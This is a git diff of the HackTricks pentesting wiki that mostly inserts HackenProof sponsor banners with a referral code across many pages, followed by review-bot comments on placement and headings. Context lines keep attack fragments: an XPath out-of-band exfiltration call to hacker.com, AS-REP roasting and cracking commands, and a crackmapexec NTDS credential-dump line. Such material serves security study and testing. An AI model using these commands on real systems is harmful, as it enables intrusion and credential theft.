+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + ## Basic Information From: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) @@ -169,6 +180,17 @@ curl http://127.0.0.1:80 * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295) + +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 7183a75ce..101383688 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -17,9 +17,9 @@ Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Basic Information 
@@ -387,9 +387,9 @@ There are other methods to get command execution, such as adding [extended store Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## MSSQL Privilege Escalation @@ -534,9 +534,9 @@ You probably will be able to **escalate to Administrator** following one of thes ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md index c0a8a7dd8..2f3bbbc23 100644 --- a/network-services-pentesting/pentesting-ntp.md +++ b/network-services-pentesting/pentesting-ntp.md 
@@ -17,9 +17,9 @@ ​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Basic Information @@ -96,9 +96,9 @@ Entry_2: Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md index a21dc01e5..2f97709b4 100644 --- a/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/pentesting-web/content-security-policy-csp-bypass/README.md @@ -17,9 +17,9 @@ Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## What is CSP @@ -386,9 +386,9 @@ Trick from [**here**](https://ctftime.org/writeup/29310). ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Unsafe Technologies to Bypass CSP 
@@ -533,9 +533,9 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index 772afe83c..dcc3bbbf3 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -17,9 +17,9 @@ ​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## What is CSRF? @@ -189,9 +189,9 @@ To set the domain name of the server in the URL that the Referrer is going to se ​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## **Exploit Examples** 
@@ -594,9 +594,9 @@ with open(PASS_LIST, "r") as f: ​​​​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md index e39362387..94c6d7191 100644 --- a/pentesting-web/file-inclusion/README.md +++ b/pentesting-web/file-inclusion/README.md @@ -17,9 +17,9 @@ Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## File Inclusion @@ -385,9 +385,9 @@ Be sure to URL-encode payloads before you send them. Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ -Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects. [**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects. [**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## LFI2RCE 
@@ -553,9 +553,9 @@ If you found a **Local File Inclusion** and you **can exfiltrate the path** of t Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects. \ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md index f59ca541e..4ac2bd3a9 100644 --- a/pentesting-web/reset-password.md +++ b/pentesting-web/reset-password.md @@ -17,9 +17,9 @@ ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} @@ -328,9 +328,9 @@ The **reset tokens must have an expiration time**, after it the token shouldn't ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md index aaab68c93..65c0dbfaa 100644 --- a/pentesting-web/xpath-injection.md +++ b/pentesting-web/xpath-injection.md @@ -16,13 +16,22 @@
+
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + +# **Basic Syntax** XPath Injection is an attack technique used to exploit applications that construct XPath \(XML Path Language\) queries from user-supplied input to query or navigate XML documents. Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath_syntax.asp) -# **Basic Syntax** - ## Nodes | Expression | Description | @@ -116,6 +125,17 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp | //\* | Selects all elements in the document | | //title\[@\*\] | Selects all title elements which have at least one attribute of any kind | + +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + # Example ```markup @@ -346,6 +366,15 @@ doc-available(concat("http://hacker.com/oob/", RESULTS)) [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection) +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} +
diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md index ecd322e5a..80f765575 100644 --- a/windows-hardening/active-directory-methodology/asreproast.md +++ b/windows-hardening/active-directory-methodology/asreproast.md @@ -16,7 +16,18 @@
-## ASREPRoast + +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + + +# ASREPRoast The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_. @@ -24,13 +35,13 @@ That means that anyone can send an AS\_REQ request to the DC on behalf of any of Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**. -#### Enumerating vulnerable users (need domain credentials) +### Enumerating vulnerable users (need domain credentials) ```bash Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView ``` -#### Request AS\_REP message +### Request AS\_REP message {% code title="Using Linux" %} ```bash 
@@ -52,14 +63,14 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0. {% endhint %} -### Cracking +## Cracking ``` john --wordlist=passwords_kerb.txt hashes.asreproast hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` -### Persistence +## Persistence Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties): @@ -67,8 +78,20 @@ Force **preauth** not required for a user where you have **GenericAll** permissi Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose ``` +# References [**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) + +
+ +​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ +This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ +Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. + +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} + +
Support HackTricks and get benefits! diff --git a/windows-hardening/stealing-credentials/README.md b/windows-hardening/stealing-credentials/README.md index d3edf7315..ad991f8dd 100644 --- a/windows-hardening/stealing-credentials/README.md +++ b/windows-hardening/stealing-credentials/README.md @@ -19,9 +19,9 @@ Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Credentials Mimikatz @@ -175,9 +175,9 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %} ## Stealing SAM & SYSTEM 
@@ -343,9 +343,9 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco ​Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ ****This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among crypto projects.\ -[**Sign up on HackenProof**](https://hackenproof.com/register) to get rewarded without delays and become the web3 hacker legend. +[**Sign up on HackenProof**](https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA) to get rewarded without delays and become the web3 hacker legend. -{% embed url="https://hackenproof.com/register" %} +{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}
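Review bot: The three hunks in network-services-pentesting/6379-pentesting-redis.md add the same sponsor banner three times (above `## Basic Information`, between the redis-dump line and `## Redis RCE`, and after the GitLab `git://` note), 33 added lines in total, and the subject "new link" does not mention them. The two hunks in 8009-pentesting-apache-jserv-protocol-ajp.md do the same. Move the new banners to their own commit with a subject that says so, and keep one per page, so the block does not separate the enumeration section from the RCE section it leads into. The added `Did you know` line also starts with a zero-width space carried over from the other pages; drop it in the new copies.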
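Review bot: `referral_code=i_E6M25i_Um9gB56o-XsIA` is hard-coded twice per banner, once in the Markdown link and once in the `{% embed %}` tag, in every hunk from pentesting-mssql-microsoft-sql-server/README.md through windows-hardening/stealing-credentials/README.md. The next URL change is another edit across all of these files, and a copy that is missed will not be noticed. Keep the banner text in one shared place and reference it from each page. While these lines are open, the context line `****This [**crypto bounty alone**]` in pentesting-ntp.md, the third csrf-cross-site-request-forgery.md hunk and both later stealing-credentials hunks carries an empty bold pair that should be removed.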
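Review bot: In the second hunk of pentesting-web/file-inclusion/README.md (`@@ -385,9 +385,9 @@`) the changed line still fuses two banner sentences, `Check out the ... among crypto projects. [**Sign up on HackenProof**]...`, where every other copy ends the first sentence with `\` and puts the sign-up link on its own line. Since this line is rewritten anyway, split it to match the other banners so they render the same and the next bulk replace applies cleanly here too.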
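Review bot: The first hunk of pentesting-web/xpath-injection.md moves `# **Basic Syntax**` from just above `## Nodes` to above the paragraph that defines XPath Injection, so the definition and the w3schools link now sit under a "Basic Syntax" heading and the page opens with a banner instead of an introduction. Leave the heading where it was, directly above `## Nodes`, and put the banner above the definition paragraph if it is wanted there. The subject "new link" gives no reason for the reorder, which suggests it was not intended.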
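Review bot: The heading changes in windows-hardening/active-directory-methodology/asreproast.md leave the outline inconsistent: the title becomes `# ASREPRoast`, but `### Enumerating vulnerable users` and `### Request AS\_REP message` now hang off it with no `##` parent, while the later `## Cracking` and `## Persistence` sit one level above them. Promote the first two to `##` so all four are siblings under the title, or say in the commit message why they differ. The link under the new `# References` heading reads "AS-RRP Roasting"; correct it to "AS-REP Roasting" in the same change.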